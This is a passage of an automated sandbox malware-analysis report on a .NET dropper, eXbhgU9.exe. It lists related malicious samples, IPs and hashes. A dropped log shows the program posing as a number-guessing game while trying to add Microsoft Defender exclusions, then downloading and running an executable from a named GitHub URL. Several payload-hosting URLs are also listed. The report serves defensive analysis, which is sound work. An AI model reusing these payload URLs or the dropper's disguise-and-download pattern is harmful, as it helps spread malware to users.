                                                                                                                • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                                                185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                raw.githubusercontent.comPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.111.133
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.109.133
                                                                                                                OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 185.199.108.133
                                                                                                                8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                • 185.199.111.133
                                                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.109.133
                                                                                                                github.comfxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 20.233.83.145
                                                                                                                Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 20.233.83.145
                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 20.233.83.145
                                                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 20.233.83.145
                                                                                                                ORDER-241221K6890PF57682456POC7893789097393.j.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 20.233.83.145
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 20.233.83.145
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSPO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 172.67.144.225
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 172.67.144.225
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 172.67.144.225
                                                                                                                Jx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 162.159.128.233
                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                • 188.114.97.3
                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 188.114.96.3
                                                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.97.3
                                                                                                                FASTLYUSPurchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.108.133
                                                                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.111.133
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.111.133
                                                                                                                https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.2.137
                                                                                                                star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                • 167.83.165.108
                                                                                                                EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.2.137
                                                                                                                installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.65.21
                                                                                                                https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 151.101.129.44
                                                                                                                GITHUBUSrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 192.30.252.154
                                                                                                                https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                • 140.82.112.3
                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                • 140.82.121.4
                                                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                • 140.82.113.4
                                                                                                                ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                                                • 140.82.121.4
                                                                                                                3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.113.4
                                                                                                                https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.113.22
                                                                                                                PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                • 140.82.121.4
                                                                                                                CORREIO BCV.zip.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.112.22
                                                                                                                https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 140.82.121.4
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 185.199.110.133
                                                                                                                • 140.82.121.4
                                                                                                                a0e9f5d64349fb13191bc781f81f42e1PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.18.19
                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.18.19
                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                • 104.21.18.19
                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.18.19
                                                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.18.19
                                                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                • 104.21.18.19
                                                                                                                vlid_acid.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.18.19
                                                                                                                AquaPac.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 104.21.18.19
                                                                                                                R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.21.18.19
                                                                                                                No context
                                                                                                                Process:C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1282048
                                                                                                                Entropy (8bit):7.989392691400588
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:tI05w/i0EgOp2bAntruwSB/n5FqAmHrnaNWQu2/O7pOuSLBLX:tI05w/i0Ed2buawK/qAmLGWx7pOLLBz
                                                                                                                MD5:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                SHA1:5BDF461219E68AA7175A5FA01962AF8E3F583C7E
                                                                                                                SHA-256:F7846A193C00E22D512FDC71FCA6FB3F3AF434179681D26700B11B7F4E69AB64
                                                                                                                SHA-512:BFB8DFA87AAF0DC9AFD3AE19C6082A53917501899F582DDC10A56A311B9504A64F25C1B923ABE0B5077CEF64F6EF891089358D652E4A7618DACA9418BAD03017
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Reputation:low
                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg.............................$............@...........................;...........@................................. P-..............................P-.........................................................................................................................@............0... ......."..............@................P...2...0..............@............@...0...$...b..............@.............'..p......................@....data....P...P-..P...@..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:modified
                                                                                                                Size (bytes):1058
                                                                                                                Entropy (8bit):5.356262093008712
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                Malicious:true
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):2232
                                                                                                                Entropy (8bit):5.381427237108526
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:JWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:JLHyIFKL3IZ2KRH9Ougss
                                                                                                                MD5:F92F0A6A81466A0AE1176EA8E0B118CF
                                                                                                                SHA1:17ECFC14C8F06E4209CEF33CC4EFBD24E722A410
                                                                                                                SHA-256:6079E5D353621B5ACE8D0EE0E4515A770513ADD3BB257F38760AEC6A7DF0472D
                                                                                                                SHA-512:164F13D8FA37537D7700F565BFD43A95A60574E587F5EDC02B01B1E507608DDE6EB2C9D82B7783147A7098B4E8FEE5B2F74035AA8DC48C36B5C883DB984E2561
                                                                                                                Malicious:false
                                                                                                                Preview:@...e.................................:..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):651
                                                                                                                Entropy (8bit):4.964269002886412
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:clyD3Cg81ye4A28scWIODMGN6TaWyL09Wy+621QYpTNIvLIj+GNT:nDp81sA8IaM7TaF094iv8j++
                                                                                                                MD5:CE6CC66B2A3FEE1EFC9EFD5D5E6E1B0B
                                                                                                                SHA1:485B611193E4C6EE305C2F47CE0DA5A6D2E2FBBB
                                                                                                                SHA-256:5261A00FC50367D7F57DDFD53B67AA48B7CD3012D5BB361C384B127FFF59CBFC
                                                                                                                SHA-512:A5C7F0831F7B1C39D0BF71DFB030C64F616B9C02A9F5D5CB24D2B7A85B51AB0B818D4CA65534C5F33476D4AFD0A58A607536A612A919FF655FDC250A7661D0CD
                                                                                                                Malicious:false
                                                                                                                Preview:Welcome to the 'Guess the Number' game!..I've picked a number between 1 and 100. Try to guess it!..Enter your guess: .Time's up! The correct number is 15...Congratulations! You guessed the number 15 in 1 attempts!..Folder 'FkSpRTrp' created successfully at C:\...Failed to add folder to Microsoft Defender exclusions. Exit code: 1..Failed to add folder 'Users' to Microsoft Defender exclusions. Exit code: 1..Downloading file from https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe.....File downloaded successfully to C:\FkSpRTrp\jyidkjkfhjawd.exe...Running file C:\FkSpRTrp\jyidkjkfhjawd.exe.....File executed successfully...
                                                                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):5.03888709426846
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                File name:eXbhgU9.exe
                                                                                                                File size:15'360 bytes
                                                                                                                MD5:9be5ac720dcf1838fd5a2d7352672f66
                                                                                                                SHA1:d8046191a1d1756768a8bad62ce3ba757deb7d53
                                                                                                                SHA256:cc5eb5ac7cb599572a1c9747efa83774221e0ad4a24ed6545d5bc03a44a23196
                                                                                                                SHA512:72f618868c9960332931d7055a4bff5b3394979a1f5d8089d51c6dc436a121a3d9332d405a3eb3f65fcb8c5930c73606e194782fcf29b46d5e42235de29acc33
                                                                                                                SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                TLSH:16620B44A3FC1617FABF0F386DB543450B71BA239C32EB5E24DCA48A2D267114AA0767
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..2...........P... ...`....@.. ....................................`................................
                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                Entrypoint:0x405006
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows cui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
